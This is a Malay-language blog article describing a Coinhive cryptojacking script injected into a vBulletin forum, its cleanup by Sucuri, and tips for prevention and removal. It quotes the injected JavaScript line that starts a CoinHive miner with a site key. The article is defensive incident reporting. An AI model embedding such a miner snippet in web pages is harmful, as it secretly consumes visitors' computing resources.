Bagaimana untuk menghapus skrip perlombongan kriptografi Coinhive dari laman web anda

Saya biasanya melawat forum setiap hari dan saya tidak melihatnya sehari sebelumnya. Jadi saya menganggap bahawa ini telah berlaku beberapa waktu pada waktu malam, masa saya, ketika saya sedang tidur.

Saya menggunakan perisian vBulletin untuk forum, dan ia telah dikemaskini kepada versi terkini. Selain itu, ini agak mengejutkan untuk kami, kerana domain TheWindowsClub.com menggunakan Sucuri Web Antivirus & Firewall untuk melindungi dirinya daripada ancaman & serangan web dalam talian.

Perisian keselamatan PC saya berjaya menghentikan skrip jahat dari menjalankan pada komputer Windows 10 saya. Saya menyemak dengan penyemak imbas lain seperti Chrome & Edge, dan hasilnya sama.

Setelah mengklik kanan pada laman web forum dan memeriksa kod sumber, saya mendapati bahawa ia adalah skrip jahat CryptoMiner dari CoinHive.

Ini adalah Javascript Coinhive yang berbahaya yang telah masuk ke dalam kod forum saya:

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Bagaimanapun, perkara pertama yang saya lakukan adalah mengambil forum ke bawah dan memaklumkan Sucuri.

Orang Sucuri membersihkan forum skrip Coinhive yang telah didorong oleh forum saya dalam beberapa jam, dan semua adalah baik.

Apa itu CoinHive

Coinhive menawarkan penambang JavaScript untuk cryptocurrency Monero yang anda boleh membenamkan di laman web anda dan menggunakan CPU pelawat laman web komputer untuk mengutip syiling untuk anda.

Ini dipanggil Cryptojacking . Ia melibatkan perampasan pelayar pengguna untuk penambangan cryptocurrency. Sesetengah pemilik laman web boleh menggunakannya sendiri untuk menghasilkan wang - tetapi dalam kes kita, ia telah disuntik.

Apabila pengguna mengakses laman web yang dijangkiti, pelaksanaan JavaScript Coinhive dan lombong Monero menggunakan sumber CPU pengguna. Ini mungkin menyebabkan pendaratan CPU & kemalangan sistem yang tidak dijangka pada mesin mangsa.

Sekarang jika pelayar anda dijangkiti, anda akan melihat penggunaan sumber anda naik. Tutup penyemak imbas, dan ia akan jatuh.

Saya bertanya kepada saurabh Mukhekar rakan sekerja saya untuk melawat forum saya menggunakan

Mac dan melihat apa yang terjadi. Nah, komputer Macnya juga terpengaruh apabila dia membuka forum dengan Safari! Dia adalah salah satu pengguna Mac OSX pintar yang menggunakan perisian antivirus untuk Macnya. Antivirus Avast untuk Mac berjaya menghentikan skrip jahat daripada berjalan. Said Saurabh,

Coinware malware tidak hanya merampas PC Windows tetapi juga Mac, kerana ia adalah jangkitan Javascript berasaskan pelayar. Baiklah saya tidak percaya pada mitos bahawa Mac tidak memerlukan perisian antivirus, maka mesin saya akan dijangkiti dan Mac saya akan terus mengeluarkan duit syiling untuk orang lain.

Mencegah CoinHive daripada menjangkiti laman web anda

Jangan gunakan sebarang template atau plugin NULL pada tapak web / forum anda

1. Tetap CMS anda dikemaskini kepada versi terkini
2. Kemas kini perisian hosting anda secara tetap (PHP, Database, dll …)
3. Selamatkan laman web anda dengan penyedia keselamatan web seperti Sucuri, Cloudflare, Wordfence, dan sebagainya.
4. Ambil langkah berjaga-jaga yang asas untuk mengamankan blog anda.
5. Penghapuskan miner CoinHive dari laman web

Pertama sekali, anda perlu menjadi juruweb web laman web yang dijangkiti - atau mempunyai kelayakan pentadbiran yang memberi anda akses kepada semua fail laman web.

Sekarang apabila antivirus anda mengesan jangkitan CoinHive, klik kanan pada halaman web dan pilih

Lihat Kod Sumber. Tekan seterusnya Ctrl + F dan cari "CoinHive". Setelah anda mengenal pasti lokasi kod jahat, anda perlu melihat kedudukannya - di mana letaknya. Kini anda perlu mengeluarkannya secara manual. Untuk melakukan ini, anda memerlukan sedikit pengekodan pengetahuan mengenai platform anda. Anda perlu mencari fail yang dijangkiti dan mengalih keluar skrip di atasnya secara manual. Jika anda tidak pasti mengenainya, sila minta beberapa pakar melakukannya. Oleh kerana kami menggunakan Sucuri, kami membiarkan mereka melakukannya.

Setelah melakukan itu, kosongkan cache pelayan dan penyemak imbas anda. Jika anda menggunakan sebarang plugin cache atau katakan MaxCDN, kosongkan cache itu juga.

Lindungi diri anda dengan skrip perlombongan crypto

Cryptocurrencies & teknologi Blockchain mengambil alih dunia. Ia mewujudkan impak ke atas ekonomi global dan menyebabkan gangguan teknologi juga. Semua orang telah mula menumpukan pada pasaran yang menguntungkan itu - dan ini termasuk penggodam laman web juga. Sebagai peningkatan pulangan, kita harus mengharapkan teknologi sedemikian akan disalahgunakan. Itulah sisi gelap teknologi yang muncul.

Apa yang boleh kita lakukan adalah untuk mengambil langkah berjaga-jaga yang terbaik setiap saat. Selain daripada menggunakan perisian keselamatan yang baik, gunakan pelanjutan Chrome atau Firefox yang menghalang laman web dari menggunakan CPU anda untuk melombong Cryptocurrency - atau lebih baik lagi, gunakan Anti-WebMiner yang akan menghentikan serangan Script Cryptojacking Mining dengan mengubah suai fail Host anda. Ia berfungsi pada semua pelayar. Jika anda pengguna Mac, sila dapatkan perisian antivirus untuk komputer anda juga.

Sebagai langkah berjaga-jaga yang banyak, jika anda merasakan bahawa anda mungkin pernah melawat laman web yang dijangkiti, itu adalah idea yang baik untuk membersihkan penyemak imbas anda cache dan imbas mesin anda dengan perisian antivirus anda serta AdwCleaner.

Tetap selamat, berhati-hati!